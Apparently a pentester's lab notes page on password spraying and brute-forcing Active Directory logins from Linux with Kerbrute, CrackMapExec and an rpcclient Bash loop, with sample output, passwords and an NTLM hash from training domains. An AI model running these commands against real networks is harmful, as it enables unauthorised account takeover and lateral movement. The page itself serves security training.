Brute Force / Password Spraying - Linux Tools
This page is for password spraying when we have access to a Linux host inside the internal network.
Kerbrute
Kerbrute is a great tool if we don't have a username:password yet, but we want to attempt to brute force our way in. We can brute force usernames or passwords... as well as spray a discovered credential.
$ ./kerbrute -h
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quitSpray Password
If we discover a credential, we can spray it against known users.
attacker@kali$ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop
2022/02/17 22:57:12 > Using KDC(s):
2022/02/17 22:57:12 > 172.16.5.5:88
2022/02/17 22:57:12 > [+] VALID LOGIN: [email protected]:Welcome1
2022/02/17 22:57:12 > Done! Tested 57 logins (1 successes) in 0.172 seconds\Password Brute Force
If we have discovered usernames but no password, we can try to brute force valid credentials.
attacker@kali$ kerbrute bruteuser --dc intelligence.htb -d intelligene.htb /usr/share/wordlists/rockyou.txt William.Lee
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop
2022/02/17 22:57:12 > Using KDC(s):
2022/02/17 22:57:12 > 172.16.5.5:88Username Brute Force
If we don't have anything, we try to find valid kerberos usernames with a usernames wordlist.
attacker@kali$ kerbrute userenum usernames.txt --dc intelligence.htb -d intelligence.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 02/08/24 - Ronnie Flathers @ropnop
2024/02/08 15:31:14 > Using KDC(s):
2024/02/08 15:31:14 > intelligence.htb:88
2024/02/08 15:31:14 > [+] VALID USERNAME: [email protected]
2024/02/08 15:31:14 > [+] VALID USERNAME: [email protected]
2024/02/08 15:31:14 > [+] VALID USERNAME: [email protected]
2024/02/08 15:31:14 > [+] VALID USERNAME: [email protected]
CrackMapExec
Password Spray / Brute Force
We can use crackmapexec to brute force passwords, usernames, and spray when we discover a new credential. It is an invaluable tool to have in our toolbox.
attacker@kali$ sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123CrackMapExec --local-auth
It's important to always test for local windows authentication as well as domain authentication when discovering a password
attacker@kali$ sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +
SMB 172.16.5.50 445 ACADEMY-EA-MX01 [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.25 445 ACADEMY-EA-MS01 [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.125 445 ACADEMY-EA-WEB0 [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)rpcclient
Using a Bash one-liner for the Attack
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; doneLast updated